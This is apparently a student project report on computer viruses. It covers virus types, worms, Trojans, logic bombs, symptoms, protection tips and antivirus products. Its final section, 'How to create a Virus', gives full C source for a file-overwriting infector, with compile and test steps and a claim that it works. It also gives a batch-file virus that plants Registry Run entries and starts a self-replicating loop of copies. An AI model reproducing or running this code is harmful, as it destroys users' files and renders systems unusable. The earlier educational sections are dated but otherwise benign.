HCL

Career Development Center

HCE-108

PROJECT

BY

VINAY KUMAR

1
 Project Topic:

Computer Virus

2
 INDEX

Introduction to Computer virus ….4

What is a Computer virus? ….5

Types of Computer virus ….6

Destructive non-virus programs ….11

How viruses affect and infect your PC ….16

Common virus symptoms ….18

Tips to protect from virus ….19

Antivirus software ….20

How to create a virus? ….25

3
Introduction to computer virus:

The history of computer viruses has begun recently, but it has

already become legendary. Almost everyone knows a few
awesome fables about these creatures, but hardy anyone
understands what computer virus is. Computer virus is an
executable code able to reproduce itself. Viruses are an area of
pure programming, and, unlike other computer programs, carry
intellectual functions on protection from being found and
destroyed. They have to fight for survival in complex conditions
of conflicting computer systems. Viruses seem to be the only
alive organisms in the computer environment, and yet another
main goal is survival. That is why they may have complex
crypting/decrypting engines, which is indeed a sort of a
standard for computer viruses nowadays, in order to carry
out processes of duplicating, adaptation and disguise……

4
What is computer virus?
In computer security technology, a computer virus is a self-
replicating or self-reproducing-automation computer program that
spreads by inserting copies of itself into other executable code or
documents. A computer virus behaves in a way similar to a
biological virus, which spreads by inserting itself into living
Cells. Extending the analogy, the insertion of a virus into the
program is termed as an "infection", and the infected file, or
executable code that is not part of a file, is called a "host". Viruses
are one of the several types of malicious software or malware.
While viruses can be intentionally destructive, for example, by
destroying data, many other viruses are fairly benign or merely
annoying. Some viruses have a delayed payload, which is
sometimes called a bomb. For example, a virus might display a
message on a specific day or wait until it has infected a certain
number of hosts. A time bomb occurs during a particular date or
time, and a logic bomb occurs when the user of a computer takes
an action that triggers the bomb. However, the predominant
negative effect of viruses is their uncontrolled self-reproduction,
which wastes or overwhelms computer resources.

Definition:

A computer virus is a computer program that can copy itself

and infect a computer without permission or knowledge of the
user. These programs are destructive to computers. Any computer
program that can cause damage to a computer is called malicious
software.
The computer viruses can corrupt data, modify existing data, or
degrade the performance of a system by utilizing resources such as
memory or disk space.
Types of computer viruses

5
The computer viruses are broadly classified into following
categories:

• Boot sector virus

• Master boot record (MBR) virus

• File infector virus

• Macro virus

• Polymorphic viruses

• Stealth viruses

• Multi-partite viruses

6
Boot sector virus:

Boot sector viruses are those that infect the boot sector on a
computer system. They first move or overwrite the original boot
code, replacing it with infected boot code. They will then move
the original boot sector information to another sector on the
disk, marking that sector as a bad spot on the disk so it will not
be used in the future. Boot sector viruses can be very difficult to
detect since the boot sector is the first thing loaded when a
computer is starts. In effect, the virus takes full control of the
infected computer.

Examples:
Form, Disk killer, Michelangelo, Stoned.

Master boot record (MBR) virus:

A MBR virus is very similar to boot sector virus, in both its

functioning and source. However, unlike boot sector virus, a
MBR virus affects the master boot record of a computer. The
MBR viruses are activated when the BIOS activates the master
boot code, before the operating system is loaded. The impact of
a MBR virus is almost same as that of a boot sector virus.

Examples:
AntiEXE, Unashamed, NYB

7
File infector virus:

File infecting viruses are, unsurprisingly, viruses that infect

files. Sometimes these viruses are memory resident. However,
they will commonly infect most, if not all of the executable files
(those with the extensions .COM, .EXE, .OVL and other
overlay files) on a system. Some file infecting viruses will only
attack operating system files (such as COMMAND.COM),
while others will attack any file that is executable. Some of
these viruses act like boot sector infectors. They replace the
“program load” instructions in an executable file with their own
instructions, and move the original program load instructions to
a different part of the file. Happily, this usually increases the
file’s size, making detection a little easier. Other file infecting
viruses work by using companion files. They rename all files
with .COM extensions to .EXE, and then write a file with the
same name and a .COM extension. This new file will usually
have the “hid-den” attribute, making it difficult to detect with
ordinary file handling commands. By default, MS-DOS
executes the .COM file before the .EXE file so that the .COM
file is executed first, loading the virus.

Examples:

Snow.A,
Jerusalem,
Cascade

8
Macro virus:

Before discussing about macro viruses, let’s first explain the

term “macro”. A macro is a small program that is used to
automate, a series of operations. This helps the users to perform
a series of operations using a single action, thereby saving the
user from having to carry them out one by one.

A macro virus is a kind of virus that is written using the macro

feature of an application. Macro feature is available only in
certain applications like MS-Word, MS-Excel, MS-PowerPoint,
MS-Access, Corel Draw, etc. hence a macro virus infects only
the files that are created using program itself but the documents
that are created using the program that supports macro language.

When a document infected by a macro virus is opened, the virus

copies itself to the default document template. Once a default
template is infected, every document that is opened from then
on will be infected as well, making all documents created or
opened from then on will be infected as well, making all
documents created or opened a carrier of the macro virus.

Examples:

Concept,
Nimda,
Melissa.

9
Polymorphic viruses:

Polymorphic viruses change their appearance with each

infection. Such encrypted viruses are usually difficult to detect
because they are better at hiding themselves from anti-virus
software. That is the purpose of the encryption. Polymorphic
viruses take encryption a step further by altering the encryption
algorithm with each new infection. Some polymorphic viruses
can assume over two billion different guises. This means anti-
virus software products must perform algorithmic scanning, as
opposed to standard string-based scanning techniques that can
find simpler viruses.

Stealth viruses:

Stealth viruses attempt to hide from both the operating system

and anti-virus software. To do this, they must stay in memory so
they can intercept all attempts to use the operating system
(system calls). The virus can hide changes it makes to file sizes,
directory structures, and/or other operating system aspects.
Since part of the virus is memory resident, there will be less
memory available to users. The virus must hide this fact as well
as from both users and anti-virus software. Stealth viruses must
be detected while they are in memory. Once found, they must be
disabled in memory before the disk-based components can be
corrected.

Multi-partite viruses:

Multi-partite viruses are those that infect both boot sectors and
executable files. They are the worst viruses of all because they
can combine some or all of the stealth techniques, along with
polymorphism to prevent detection.

10
Destructive non virus programs:

Aside from viruses, there are other threats to user systems,

including:

© Worms
© Trojan Horses
© Logic Bombs

As well as being potentially destructive by themselves, each can

also be used as a vehicle to propagate any virus.

Worms:

Viruses are far from the only maverick programs that can disrupt
a computer system. Worms are constructed to infiltrate
legitimate data processing programs and alter or destroy the
data. Often what people believe is a virus infection is, in fact, a
worm program. This is not as serious because worms do not
replicate themselves. But the damage caused by a worm attack
can be just as serious as a virus, especially if not discovered in
time. For example, suppose a worm program instructs a bank’s
computer to transfer funds to an illicit account. The fund
transfers may continue even after the worm is destroyed.
However, once the worm invasion is discovered, recovery is
much easier because there is only a single copy of the worm
program to destroy since the replicating ability of the virus is
absent. This capability may enable it to re-infect a system
several times. A worm is similar to a benign tumor while a virus
is like a malignant one.

11
Definition:

Computer worms:-

A computer worm is malicious software that spread from

computer to computer without the use of any host files. The
worms are spread through networks like LAN, WAN and also
through Internet.
There are various ways by which a worm spread through
Internet like E-mails, Messaging and Chats.

Worms almost always cause harm to the network, like

consuming network bandwidth.

Some examples of computer worms are;

Blaster,

Code red,

Fog,

ILOVEYOU,

WANK,

Witty.

12
Trojan horses:

Trojan Horses are not viruses because they do not reproduce

themselves and spread as viruses do.

The mythical story of the original Trojan Horse is well known.

When Greek warriors concealed themselves in an attractive
wooden horse and left it outside the gates of the besieged city of
Troy, the Trojans assumed it was a friendly peace offering and
took it in. The Greek warriors then leaped out and wreaked
havoc. Trojan Horse software works on the same principle. A
program may seem both attractive and innocent, inviting the
computer user to copy (or download) the software and run it.
Trojan Horses may be games or some other software that the
victim will be tempted to try.

Trojan Horses are usually more subtle, especially when they are
used for embezzlement or industrial espionage. They can be
programmed to self-destruct, leaving no evidence other than the
damage they have caused. A Trojan Horse is particularly
effective for the common banking crime known as ‘salami
slicing’ in which small sums unlikely to be noticed are sliced off
a number of legitimate accounts and moved to a secret account
being operated by the thief.

Definition:

Trojan horse:

A Trojan Horse is a destructive program that has been disguised

(or concealed in) an innocuous piece of software.
Indeed, worm and virus programs may be concealed within a
Trojan Horse.

13
Trojan is another type of malicious software that appears to
perform a certain action but in fact performs another.
And often these hidden actions are for negative purpose only
like:

 Retrieving a user’s account and password without the

user’s knowledge to gain remote access.

 Spreading other malware, such as viruses: this type of

Trojan horse is called a ‘dropper’ or ‘vector’.

 Erasing or overwriting data on a computer.

 Spying on a user to gather information like browsing habits

of the user, etc. These types of programs are called spyware.

Some examples of computer Trojans are:

• AIDS
• Beast Trojan
• Bifrost
• Nuclear RAT (NR, NucRat)
• Insurrection
• Bandook
• Optix Pro
• Shark

14
Logic Bombs:

Writing a logic bomb program is similar to creating a Trojan

Horse. Both also have about the same ability to damage data,
too. Logic bombs include a timing device so it will go off at a
particular date and time. The Michelangelo virus is embedded
in a logic bomb, for example. Other virus programs often
include coding similar to that used in logic bombs, but the
bombs can be very destructive on their own, even if they lack
the ability of the virus to reproduce. One logic bomb caused
major problems in the Los Angeles water department’s system.

Logic bombs are usually timed to do maximum damage. That

means the logic bomb is a favored device for revenge by
disgruntled former employees who can set it to activate after
they have left the company. One common trigger occurs when
the dismissed employee’s name is deleted from payroll records.
On one occasion, a student left a logic bomb timed to explode
and wipe out his university’s records well after he had collected
his degree and was long gone. This example illustrates the
pernicious nature of logic bombs which can be written literally
decades before they explode.

The built-in delay has been used to hold software “hostage” until
a ransom is paid. These ransom demands are usually announced
via a message to the user warning them to “pay up and we will
tell you how to turn off the bomb”. Logic bombs can also be
insurance for suppliers or consultants who set up a computer
system, causing data to be destroyed if their bills are not paid.
This threat was used when a Maryland library refused to pay for
a system that did not function properly; fortunately the bomb
was found before any data could be damaged. When trying to
assess whether a computer system has fallen victim to a virus,
logic bomb, worm or Trojan horse.

15
How viruses affect and infect your PC.
Before you can safeguard your system against viruses, it’s
important to understand how they spread and what they do to
infected systems. The best virus protection program is
consistent, ongoing education of computer users about the virus
threat. Even with the proliferation of on-line services and
communications, most viruses are still spread via infected floppy
disks. The front line in the war against viruses must be fought by
the user who is about to put a disk into the drive. Without an
effective, ongoing education campaign, virus fighting efforts
will be doomed to lighting backfires against infections already in
place.

How viruses spread:

Here are four common scenarios that spread viruses:

© A user brings a game to work that his child downloaded from

a local computer BBS. Without thinking, the user runs the game
on the company network to show fellow workers how cool it is.
Unbeknownst to this user, the game program was infected with a
virus. Now the entire company network is infected, too.

© Software purchased from a retailer in shrink wrap is infected

because the store re-wrapped some returned software without
checking the disks for viruses. Unfortunately, the original buyer
had tried the software out on an infected machine.

16
© An instructor distributes disks to students so they can
complete a class assignment. One student decides to do his
homework in the office at night. Unfortunately, the instructor
was not vigilant and distributed infected disks to the entire class.

© A friend gives you a disk so you can try out a new graphics
program. The infection on your friend’s machine spreads to
yours when you run the program for the first time. (The nifty
graphics available don’t quite compensate for the three weeks
you spend reconstructing your lost data files.)

Viruses are designed to proliferate and propagate. This means

each and every contact between your system and any other
system is an opportunity for infection. That can include floppy
disks and contacts via modem (or other network connection). Be
especially careful of users who frequently use a number of
different systems outside your company. Three notorious
examples are:

© Field service technicians;

© Salespeople who run demonstration programs on your system;

and

© Outside auditors who use their disks in your system (or, in

some cases, connect their notebook computers directly to your
network).

17
Common virus infection symptoms:

Viruses can affect your computer in many ways. Although there

are no telltale signs of a virus, there are a few symptoms that
may suggest that your computer has a virus, courtesy of Dr.
Duane Whitmire of BGSU.

• Unexplained messages appear on the screen

• Specific files are mysteriously deleted

• Unknown files are added to a disk

• An entire disk or drive is erased

• The keyboard does not work properly

• Unexplained modifications are made to data or documents

• Application software seems to be changed

• Operating system software appears to be modified

• Unexplained printing problems occur

Of course, these are not the only symptoms that may present
themselves if you have a virus. The best way to detect a virus is
to use anti-virus software, which is described in the following
sections.

18
TIPS to protect from VIRUSES:
Viruses can come from many different origins, so it is important
to protect yourself from potential problems

BACK UP YOUR WORK

Backing up your work on several removable disks or hard drives

is often a surefire way to avoid losing data due to viruses. If a
virus infects your hard drive, your data will be safe on the
removable media and vice versa.

RUN NEW SOFTWARE WITH CAUTION

Always be leery of new software, especially if the software is

not coming from a sealed package, such as software borrowed
from a friend. Always use your anti-virus software to scan the
new software first before loading it. This goes for software
downloaded from the Internet as well. Also, it may be a good
idea to make a copy of the original and run the software from the
copy if possible. This way, your originals will not be infected by
viruses your computer may already have.

USE ANTI-VIRUS SOFTWARE

Using anti-virus software is the single most effective way to

protect you from viruses. Most anti-virus software protects your
system from viruses and eradicates virus that have been
contracted. Newer versions of anti-virus software also offer
security features and hacking protection. The following section
reviews some of the most popular software and links to web
sites dealing with anti-virus software.

19
`ANTIVIRUS SOFTWARE:
Anti-virus software is any software that protects your computer
from viruses, or eradicates viruses that have already been
contracted on the computer. Below are some popular anti-virus
programs and links to their corresponding web pages. It should
be mentioned, however, that many of these sites (as well as other
sites) may offer free software or trial software. Also, here at
BGSU, you can obtain free copies of virus software. An un-
keyed version of virus software can be downloaded from the
BGSU software server at http://software.bgsu.edu/ when
students are on campus. BGSU has a site license for McAfee
Virus Scan for the PC and Virex for the Mac.

ALADDIN ESAFE

Aladdin eSafe :-

Aladdin's eSafe offers protection from a variety of viruses, spam

emails, and other options for business owners.

20
MCAFEE VIRUSSCAN

McAfee:

McAfee’s Virus Scan offers protection from viruses spread

through email, the Internet, downloads shared disks, and
synchronization with your PDA. The program also alerts you to
suspicious activity on your computer that may be viruses. It also
prevents hackers from entering your system, and offers new
updates for the coverage of new viruses.

SYMANTEC NORTON ANTIVIRUS

Norton Antivirus:

Symantec's Norton Antivirus is a program that removes viruses

automatically, protects you from threats from email and instant
messaging, and automatically updates itself to defend you
against new viruses.

21
Using antivirus is a must ….
This fig. will show you how the antivirus helps to detect viruses
in your PC.

You have to change the settings of the antivirus you are using in
order to delete or move the virus etc...

Your antivirus should be updated regularly so that it detects the

newer viruses and threats to your PC…

22
Learning more about computer Virus:

Sometimes the best defense is a good education. To that end,

there are several Internet-based resources you can use to learn
more about computer viruses—how they work, and how to
protect against them. Many of these sites also provide lists of the
most menacing viruses, as well as alerts for newly created
viruses.

Here are some of the best Web sites to visit:

• Computer Associates Virus Information Center

(www3.ca.com/virus/)

• Computer Security Resource Center Virus Information

(csrc.ncsl.nist.gov/virus/)

• F-Secure Security Information Center

(www.datafellows.com/virus-info/)

• IBM Antivirus Research Project

(www.research.ibm.com/antivirus/)

• McAfee AVERT (www.mcafeeb2b.com/naicommon/avert/)

• Sophos Virus Analyses (www.sophos.com/virusinfo/analyses/)

• Symantec Security Response (www.symantec.com)

23
• Trend Micro Virus Information Center
(www.antivirus.com/vinfo/)

• Virus Bulletin (www.virusbtn.com)

• Viruslist.com (www.viruslist.com)

• The WildList Organization International (www.wildlist.org)

SUMMARY

Computer viruses are malicious computer programs, designed to

spread rapidly and deliver various types of destructive payloads
to infected computers. Viruses have been around almost a long
as computers themselves, and they account for untold billions of
dollars of damage every year. While there are many different
types of viruses, the best protection against them is to exhibit
extreme caution when downloading files from the Internet and
opening e-mail attachments—and to religiously avail yourself of
one of the many antivirus software programs currently on the
market.

24
How to create a Virus

Now we shall see few examples of making a Virus…

This program is an example of how to create a virus in c.

This program demonstrates a simple virus program which upon

execution (Running) creates a copy of itself in the other file.
Thus it destroys other files by infecting them.
But the virus infected file is also capable of spreading the
infection to another file and so on.
Here’s the source code of the virus program.
Note : this program works!!

#include<stdio.h>
#include<io.h>
#include<dos.h>
#include<dir.h>
#include<conio.h>
#include<time.h>

FILE *virus,*host;
int done,a=0;
unsigned long x;
char buff[2048];
struct ffblk ffblk;
clock_t st,end;

void main()
{
st=clock();
clrscr();

25
done=findfirst(“*.*”,&ffblk,0);
while(!done)
{
virus=fopen(_argv[0],”rb”);
host=fopen(ffblk.ff_name,”rb+”);
if(host==NULL) goto next;
x=89088;
printf(“Infecting %s\n”,ffblk.ff_name,a);
while(x>2048)
{
fread(buff,2048,1,virus);
fwrite(buff,2048,1,host);
x-=2048;
}
fread(buff,x,1,virus);
fwrite(buff,x,1,host);
a++;
next:
{
fcloseall();
done=findnext(&ffblk);
}
}
printf(“DONE! (Total Files Infected= %d)”,a);
end=clock();
printf(“TIME TAKEN=%f SEC\n”,
(end-st)/CLK_TCK);
getch();
}

26
COMPILING METHOD:

* BORLAND TC++ 3.0 (16-BIT):

1. Load the program in the compiler, press Alt-F9 to compile

2. Press F9 to generate the EXE file (DO NOT PRESS CTRL-

F9, THIS WILL INFECT ALL THE FILES IN CUR
DIRECTORY INCLUDIN YOUR COMPILER)

3. Note down the size of generated EXE file in bytes (SEE EXE
FILE PROPERTIES FOR IT’S SIZE)

4. Change the value of X in the source code with the noted down
size (IN THE ABOVE SOURCE CODE x= 89088; CHANGE
IT)

5. Once again follow the STEP 1 & STEP 2.Now the generated
EXE File is ready to infect

*BORLAND C++ 5.5 (32-BIT):

1. Compile once, note down the generated EXE file length in

bytes

2. Change the value of X in source code to this length in bytes

3. Recompile it. The new EXE file is ready to infect

27
HOW TO TEST:

1. Open new empty folder

2. Put some EXE files (BY SEARCHING FOR *.EXE IN

SEARCH & PASTING IN THE NEW FOLDER)

3. Run the virus EXE file there you will see all the files in the
current directory get infected.

4. All the infected files will be ready to reinfect.

That’s it

Here's another simple batch file virus:

It creates a reg file and puts it in the registry then it creates a file
in C:\ called 2.bat the 2.bat file copy’s itself into other files and
opens them each file does the same 2.bat but they EACH loop so
it keeps on opening other batches that each loop and open other
batches the only way out is to boot in safe mode.

You have to write it in notepad and then save it as a batch file…

Note : this program may not work in some systems.

28
del C:\1.reg
>>"C:\1.reg" ECHO windows Registry Editor Version 5.00
>>"C:\1.reg" ECHO
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\windows
\Cur rentVersion\Run]
>>"C:\1.reg" ECHO "MSConfig"="C:\\1.bat "
>>"C:\1.reg" ECHO "MCUpdateExe"="c:\\2.bat"
>>"C:\1.reg" ECHO "explorer"="c:\\3.bat"
>>"C:\1.reg" ECHO "Norton"="c:\\windows\\1.bat"
>>"C:\1.reg" ECHO "System"="c:\\windows\\2.bat"
>>"C:\1.reg" ECHO "autoexec"="c:\\windows\\3.bat"
regedit.exe /s C:\1.reg

>>"C:\2.bat" ECHO :1
>>"C:\2.bat" ECHO copy 2.bat C:\3.bat
>>"C:\2.bat" ECHO copy 2.bat C:\4.bat
>>"C:\2.bat" ECHO copy 2.bat C:\5.bat
>>"C:\2.bat" ECHO start C:\2.bat
>>"C:\2.bat" ECHO start C:\3.bat
>>"C:\2.bat" ECHO start C:\4.bat
>>"C:\2.bat" ECHO start C:\5.bat
>>"C:\2.bat" ECHO copy C:\2.bat C:\windows\1.bat
>>"C:\2.bat" ECHO copy C:\3.bat C:\windows\2.bat
>>"C:\2.bat" ECHO copy C:\4.bat C:\windows\3.bat
>>"C:\2.bat" ECHO start C:\windows\1.bat
>>"C:\2.bat" ECHO start C:\windows\2.bat
>>"C:\2.bat" ECHO start C:\windows\3.bat
>>"C:\2.bat" ECHO goto 1

start 2.bat
del C:\1.reg

29